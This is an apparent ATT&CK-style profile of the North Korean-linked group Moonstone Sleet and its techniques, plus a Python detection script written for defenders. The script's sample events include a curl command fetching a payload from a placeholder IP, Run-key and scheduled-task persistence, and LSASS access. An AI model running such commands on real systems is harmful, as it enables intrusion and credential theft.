Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.[1]
| Name | Description |
|---|---|
| Storm-1789 | |
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1583.001 | Acquire Infrastructure: Domains | Moonstone Sleet registered domains to develop effective personas for fake companies used in phishing activity.[1] |
| Enterprise | T1583.003 | Acquire Infrastructure: Virtual Private Server | Moonstone Sleet registered virtual private servers to host payloads for download.[1] |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.[1] |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Moonstone Sleet used registry run keys for process execution during initial victim infection.[1] |
| Enterprise | T1217 | Browser Information Discovery | Moonstone Sleet deployed malware such as YouieLoader capable of capturing victim system browser information.[1] |
| Enterprise | T1486 | Data Encrypted for Impact | Moonstone Sleet has deployed ransomware in victim environments.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Moonstone Sleet delivered payloads using multiple rounds of obfuscation and encoding to evade defenses and analysis.[1] |
| Enterprise | T1587 | Develop Capabilities | Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims.[1] |
| Enterprise | T1587.001 | Develop Capabilities: Malware | Moonstone Sleet has developed custom malware, including a malware delivery mechanism masquerading as a legitimate game.[1] |
| Enterprise | T1585.001 | Establish Accounts: Social Media Accounts | Moonstone Sleet has created social media accounts to interact with victims.[1] |
| Enterprise | T1585.002 | Establish Accounts: Email Accounts | Moonstone Sleet has created email accounts to interact with victims, including for phishing purposes.[1] |
| Enterprise | T1589.002 | Gather Victim Identity Information: Email Addresses | Moonstone Sleet gathered victim email address information for follow-on phishing activity.[1] |
| Enterprise | T1591 | Gather Victim Org Information | Moonstone Sleet has gathered information on victim organizations through email and social media interaction.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Moonstone Sleet retrieved a final-stage payload from command and control infrastructure during initial installation on victim systems.[1] |
| Enterprise | T1027 | Obfuscated Files or Information | Moonstone Sleet delivers encrypted payloads in pieces that are then combined to form a new portable executable (PE) file during installation.[1] |
| Enterprise | T1027.009 | Obfuscated Files or Information: Embedded Payloads | Moonstone Sleet embedded payloads in trojanized software for follow-on execution.[1] |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Moonstone Sleet has used encrypted payloads within files for follow-on execution and defense evasion.[1] |
| Enterprise | T1003.001 | OS Credential Dumping: LSASS Memory | Moonstone Sleet retrieved credentials from LSASS memory.[1] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Moonstone Sleet delivered various payloads to victims as spearphishing attachments.[1] |
| Enterprise | T1566.003 | Phishing: Spearphishing via Service | Moonstone Sleet has used social media services to spearphish victims and deliver trojanized software.[1] |
| Enterprise | T1598 | Phishing for Information | Moonstone Sleet has interacted with victims to gather information via email.[1] |
| Enterprise | T1598.003 | Phishing for Information: Spearphishing Link | Moonstone Sleet used spearphishing messages containing items such as tracking pixels to determine whether users interacted with malicious messages.[1] |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | Moonstone Sleet used scheduled tasks for program execution during initial access to victim machines.[1] |
| Enterprise | T1608.001 | Stage Capabilities: Upload Malware | Moonstone Sleet staged malicious capabilities online for follow-on download by victims or malware.[1] |
| Enterprise | T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | Moonstone Sleet has distributed a trojanized version of PuTTY for initial access to victims.[1] |
| Enterprise | T1082 | System Information Discovery | Moonstone Sleet has gathered information on victim systems.[1] |
| Enterprise | T1016 | System Network Configuration Discovery | Moonstone Sleet has gathered information on victim network configuration.[1] |
| Enterprise | T1033 | System Owner/User Discovery | Moonstone Sleet deployed various malware such as YouieLoader that can perform system user discovery actions.[1] |
| Enterprise | T1569.002 | System Services: Service Execution | Moonstone Sleet used intermediate loader malware such as YouieLoader and SplitLoader that create malicious services.[1] |
| Enterprise | T1204.002 | User Execution: Malicious File | Moonstone Sleet relied on users interacting with malicious files, such as a trojanized PuTTY installer, for initial execution.[1] |
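Several rows in the table above describe host-level behaviour that leaves telemetry a defender can hunt for: curl fetching a payload from adversary infrastructure (T1071.001 / T1105), registry run keys (T1547.001), scheduled tasks (T1053.005), service creation by loaders (T1569.002) and LSASS credential access (T1003.001). The script below is an added example, not code from the referenced report or from MITRE, that runs simple detection logic for those behaviours over constructed events. The event shapes are an assumption loosely modelled on Sysmon event IDs 1 (process create), 10 (process access) and 13 (registry value set) and the System log event 7045 (service installed); every path, hostname, IP address and service name in the sample data is constructed and is not an indicator from the report.

```python
"""Hunt constructed endpoint telemetry for the behaviours tabulated above.

Added example. Events are constructed and only loosely follow Sysmon /
Windows event log field names; nothing here is an indicator from the report.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry (assumed field names; TEST-NET IP, fake paths).
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\Public\stage2.bin http://203.0.113.10/update.dat"},
    {"id": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\stage2.exe"},
    {"id": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /tr C:\Users\Public\stage2.exe /sc onlogon'},
    {"id": 7045, "ServiceName": "UpdSvc", "ImagePath": r"C:\Users\Public\svc.exe"},
    {"id": 10, "SourceImage": r"C:\Users\Public\dump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Two benign look-alikes that the rules must not flag:
    {"id": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://example.com/"},          # nothing written to disk
    {"id": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},  # query only
]


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique ID the rule maps to
    summary: str


RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
URL = re.compile(r"https?://\S+", re.I)
# curl switches that write the response to disk (-o/--output, -O/--remote-name).
CURL_OUT = re.compile(r"(^|\s)(-o|-O|--output|--remote-name)(\s|$)")
# A credential dumper needs PROCESS_VM_READ (0x10) on lsass.exe; a mask of only
# PROCESS_QUERY_LIMITED_INFORMATION (0x1000) is routine and is ignored.
PROCESS_VM_READ = 0x10


def detect(event):
    """Return a Finding for one event, or None if no rule matches."""
    eid = event.get("id")
    if eid == 1:
        image = event.get("Image", "").lower()
        cmd = event.get("CommandLine", "")
        if image.endswith("curl.exe") and URL.search(cmd) and CURL_OUT.search(cmd):
            return Finding("T1105", f"curl wrote remote content to disk (also T1071.001): {cmd}")
        if image.endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.I):
            return Finding("T1053.005", f"scheduled task created: {cmd}")
    elif eid == 13 and RUN_KEY.search(event.get("TargetObject", "")):
        return Finding("T1547.001",
                       f"run key set: {event['TargetObject']} -> {event.get('Details')}")
    elif eid == 7045:
        return Finding("T1569.002",
                       f"service installed: {event.get('ServiceName')} -> {event.get('ImagePath')}")
    elif eid == 10 and event.get("TargetImage", "").lower().endswith("lsass.exe"):
        mask = int(event.get("GrantedAccess", "0"), 16)
        if mask & PROCESS_VM_READ:
            return Finding("T1003.001", f"LSASS read access from {event.get('SourceImage')}")
    return None


def hunt(events):
    """Apply detect() to every event and keep the hits, in event order."""
    return [f for f in (detect(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"{finding.technique:10} {finding.summary}")
```

The two benign events at the end of the sample are the point of the thresholds: a curl that only makes a request, and an lsass.exe handle opened without read access, are everyday noise, so the rules key on the disk write and on the access mask rather than on the process name alone. In a real deployment the same logic would be expressed in the SIEM's query language over live Sysmon or EDR data rather than over an inline list.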